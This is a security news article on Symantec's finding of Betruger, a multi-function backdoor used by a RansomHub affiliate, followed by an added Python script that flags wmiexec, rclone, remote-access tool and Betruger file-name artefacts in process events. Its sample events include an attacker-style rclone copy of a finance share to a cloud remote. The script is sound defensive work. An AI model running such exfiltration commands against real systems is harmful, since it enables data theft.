RansomHub Affiliate Uses Custom Backdoor Betruger
Researchers at Symantec have linked a custom backdoor, tracked as Betruger, to an affiliate of the RansomHub ransomware operation. Betruger is a multi-function tool that appears to have been built specifically for ransomware intrusions: it combines screenshot capture, credential dumping, keystroke logging, network scanning, and privilege escalation in a single binary, functionality that would otherwise require several separate tools.
The Symantec Threat Hunter team identified Betruger in recent ransomware attacks and noted that its design appears aimed at reducing detection: by folding several functions into one executable, an affiliate needs to drop fewer new tools on a victim network, which shrinks the attack footprint and leaves fewer artefacts for defenders to find. That makes it attractive to RansomHub affiliates who want to simplify their operations.
"The Symantec Threat Hunter team has observed activity from a custom backdoor that can be tied to a RansomHub affiliate," reads the analysis published by Symantec. "RansomHub is a Ransomware-as-a-Service offering and the backdoor has been named Betruger." This multi-function backdoor appears to have been developed specifically for carrying out ransomware attacks, incorporating functionality typically seen across multiple tools.
Ransomware groups usually rely on legitimate tools and publicly available malware such as Mimikatz and Cobalt Strike; purpose-built tools are rare, and those that do exist have mostly been data-exfiltration utilities such as Exmatter and Exbyte. Betruger is deployed under the file names "mailer.exe" or "turbomailer.exe", but the researchers found that it contains no mailing functionality; the name is most likely chosen to make the binary look legitimate to anyone reviewing a process list.
Experts believe Betruger may have been developed to minimize the number of new tools dropped on a targeted network during a ransomware attack. RansomHub affiliates nevertheless use many other tools, and the group also employs techniques such as BYOVD (Bring Your Own Vulnerable Driver) to disable security software.
Attackers have exploited CVE-2022-24521 (a Windows Common Log File System driver flaw) to escalate privileges and CVE-2023-27532 (a Veeam Backup & Replication flaw) to leak stored credentials. Additional tools seen in recent attacks include Impacket, Stowaway Proxy, Rclone, Mimikatz, SystemBC, and remote access tools such as ScreenConnect, Atera, and Splashtop, which give the attackers persistent remote access and support data exfiltration. Because most of these are dual-use or legitimate administrative tools, their presence is a lead to be correlated with who installed them, from where, and what they connected to, rather than a verdict on its own.
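As an added illustration (not code from Symantec's report or from this article), the script below runs a small triage pass over constructed process-creation events and flags the artefacts the tools above typically leave: the Impacket wmiexec output-redirect pattern, an rclone transfer to a configured remote, the default client binaries of the named remote-access tools, and the two file names Betruger was observed using. The event format, the sample events and the remote-access binary names are assumptions; adjust them to your own telemetry and estate.

```python
"""Triage of process-creation events for tooling named in the RansomHub write-up.

Added example; the event layout mirrors Sysmon event 1 / Windows 4688 fields,
and all sample events below are constructed, not real telemetry.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    image: str
    cmdline: str
    parent_image: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


# Impacket wmiexec.py runs commands via WMI and redirects output to ADMIN$\__<timestamp>
WMIEXEC_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__", re.IGNORECASE)
# rclone transfer verb plus a "<remote>:<path>" target; the lookahead excludes drive letters like C:\
RCLONE_VERB = re.compile(r"\b(copy|sync|move|copyto|moveto)\b", re.IGNORECASE)
RCLONE_REMOTE = re.compile(r"(?:^|\s)[A-Za-z0-9_-]+:(?![\\/])")
# Default client binaries for the remote-access tools named in the report (assumed; tune for your estate)
RMM_BINARIES = {
    "screenconnect.clientsetup.exe", "screenconnect.clientservice.exe",  # ConnectWise ScreenConnect
    "ateraagent.exe",                                                   # Atera
    "srservice.exe", "srmanager.exe",                                   # Splashtop
}
# File names Symantec saw Betruger using; a name match alone is a hunting lead, not a verdict
BETRUGER_NAMES = {"mailer.exe", "turbomailer.exe"}


def rule_wmiexec(ev: ProcEvent) -> bool:
    return _base(ev.parent_image) == "wmiprvse.exe" and WMIEXEC_REDIRECT.search(ev.cmdline) is not None


def rule_rclone(ev: ProcEvent) -> bool:
    return (_base(ev.image) == "rclone.exe"
            and RCLONE_VERB.search(ev.cmdline) is not None
            and RCLONE_REMOTE.search(ev.cmdline) is not None)


def rule_rmm(ev: ProcEvent) -> bool:
    return _base(ev.image) in RMM_BINARIES


def rule_betruger_name(ev: ProcEvent) -> bool:
    return _base(ev.image) in BETRUGER_NAMES


RULES = [
    ("impacket_wmiexec", "high", rule_wmiexec),
    ("rclone_exfil", "high", rule_rclone),
    ("rmm_tool_install", "medium", rule_rmm),
    ("betruger_filename", "low", rule_betruger_name),
]


def triage(events):
    """Return one hit dict per (event, matching rule)."""
    hits = []
    for ev in events:
        for name, severity, predicate in RULES:
            if predicate(ev):
                hits.append({"host": ev.host, "user": ev.user, "rule": name,
                             "severity": severity, "image": ev.image})
    return hits


# Constructed sample events: four should fire one rule each, the Outlook launch should stay quiet.
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"CORP\jdoe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1710000000.12 2>&1",
              r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ProcEvent("FS02", r"CORP\svc_backup", r"C:\Users\Public\rclone.exe",
              r"rclone.exe copy \\FS02\Finance remote:bucket/finance --transfers 32 --config C:\Users\Public\r.conf",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("WS01", r"CORP\jdoe", r"C:\ProgramData\turbomailer.exe", "turbomailer.exe",
              r"C:\Windows\explorer.exe"),
    ProcEvent("WS03", r"CORP\asmith", r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
              "OUTLOOK.EXE", r"C:\Windows\explorer.exe"),
    ProcEvent("WS05", r"CORP\svc_it", r"C:\Users\svc_it\AppData\Local\Temp\ScreenConnect.ClientSetup.exe",
              "ScreenConnect.ClientSetup.exe /silent", r"C:\Windows\System32\msiexec.exe"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"[{hit['severity']:6}] {hit['host']} {hit['rule']:18} {hit['image']}")
```

The severities encode how much each signal means on its own: the wmiexec redirect string and an rclone push to a remote are rarely benign, a remote-access client install is common in IT shops and needs the installing user and parent process checked, and a file named mailer.exe is only worth pulling for analysis.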
"The Betruger backdoor was deployed in several recent RansomHub attacks, suggesting that it is available to at least one affiliate," concludes the report. "RansomHub is a RaaS operation run by a cybercrime group Symantec calls Greenbottle." Active since February 2024, Greenbottle has quickly grown RansomHub into the most prolific ransomware operation by the third quarter of 2024, measured by the number of claimed attacks.
"The group has reportedly won over many affiliates by offering them better terms compared to rival operations, such as a greater percentage of ransom payments and a payment model where the affiliate is paid by the victim before passing on the operator's cut," notes the report. The affiliate-friendly terms, together with a purpose-built backdoor, show how ransomware operators compete for affiliates while adapting their tooling to evade security controls.